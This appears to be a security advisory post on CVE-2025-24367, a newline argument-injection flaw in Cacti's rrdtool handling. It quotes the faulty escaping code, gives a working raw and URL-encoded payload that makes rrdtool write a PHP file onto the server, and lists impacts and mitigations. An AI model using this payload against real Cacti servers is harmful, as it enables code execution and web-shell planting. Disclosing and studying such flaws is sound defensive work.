Cacti RRDTool Post-Auth Argument Injection – CVE-2025-24367

Posted on

Vulnerable Version

versions =< 1.2.28

Fixed Version

versions 1.2.29

Base Score

8.7 high                                                                  

Vendor Description: –

Cacti is an open-source network monitoring and graphing program that aims to give a quick and efficient way to display time series data. It is commonly used to monitor network bandwidth, server performance, and other infrastructure metrics using SNMP (Simple Network Management Protocol) and RRDtool (Round-Robin Database Tool) to collect, store, and display data in graph formats. Cacti is a web-based interface that allows users to generate custom graphs, specify data collecting intervals, and easily manage devices and templates. Because of its flexibility and plugin support, it is a popular choice for both small and large enterprise systems.

CVE-2025-24367 Description: –

Cacti use the rrdtool binary to produce graphs/images based on Round Robin Databases (RRDs). A variety of switches can be configured for the binary via the web UI, notably inside the graph template or graph generation capabilities.

Cacti aims to clean up potentially contaminated user input by escaping shell metacharacters. For instance, in the function rrd_function_process_graph_options() in lib/rrd.php:

case 'right_axis_label':
	if (!empty($value)) {
		$graph_opts .= '--right-axis-label ' . cacti_escapeshellarg($value) . RRD_NL;
	}

In lib/functions.php:

/**
 * mimics escapeshellarg, even for windows
 *
 * @param  $string 	- the string to be escaped
 * @param  $quote 	- true: do NOT remove quotes from result; false: do remove quotes
 *
 * @return	string	- the escaped [quoted|unquoted] string
 */
function cacti_escapeshellarg(string $string, bool $quote = true): string {
	global $config;

	if ($string == '') {
		return $string;
	}

	/* we must use an apostrophe to escape community names under Unix in case the user uses
	characters that the shell might interpret. the ucd-snmp binaries on Windows flip out when
	you do this, but are perfectly happy with a quotation mark. */
	if ($config['cacti_server_os'] == 'unix') {
		$string = escapeshellarg($string);

		if ($quote) {
			return $string;
		} else {
			# remove first and last char
			return substr($string, 1, (strlen($string) - 2));
		}
	}

However, the sanitisation logic does not escape or remove newline characters, thus they can be injected to break out of the command and launch independent commands on the rrdtool binary, including calls to other capabilities such as RRD generation, restoration, dump, and so on.

This different functions can be called from a single payload by injecting multiple newlines. The payload below contains two separate commands: the first creates a new RRD database that is used in the second command (otherwise, the attacker would have to identify the path of an existing RRD file on the target system), and the second creates a CSV ‘graph’ of the data within the newly created my.rrd RRD file, and saves the file as xxx2.php, with PHP code embedded within it:

XXX
create my.rrd –step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
graph xxx2.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:

Encoded payload (note leading and trailing newline characters):

XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A

Impact:-

  • Remote Command Injection: By exploiting unsanitized newline characters, attackers can inject and execute arbitrary instructions via the rrdtool binary from the Cacti web interface.
  • Arbitrary File Creation: By abusing graph generating settings, attackers can create malicious files (e.g.,.php scripts) on the target server, allowing for further exploitation such as webshell deployment.
  • Privilege Escalation: If Cacti is running with elevated privileges (e.g., www-data or root), successful exploitation could result in more control over the server environment.
  • Bypassing Input Sanitization: Despite existing sanitation via escapeshellarg, the inability to handle newline characters (\n) effectively allows attackers to circumvent input filters.
  • System Compromise: Using injected commands, attackers may create or manipulate RRD files and even execute chained operations to exfiltrate data or pivot deeper into the system.
  • Persistent Backdoor Risk: The ability to save crafted files like xxx2.php containing PHP code (e.g., <?=phpinfo();?>) poses a long-term risk if undetected, enabling persistent access to the system.

Mitigations:-

  • Update Cacti Immediately: Upgrade to the latest patched version to eliminate the vulnerability.
  • Sanitize Input Properly: Ensure all user input is filtered to remove newline (\n, %0A) and carriage return (\r, %0D) characters before passing to rrdtool.
  • Restrict Write Permissions: Prevent the web server from writing to directories that could serve executable files (e.g., no .php write access in web root).
  • Limit Access to Graph Functions: Only allow trusted/admin users to configure graph templates or parameters.

Leave a Reply

Your email address will not be published. Required fields are marked *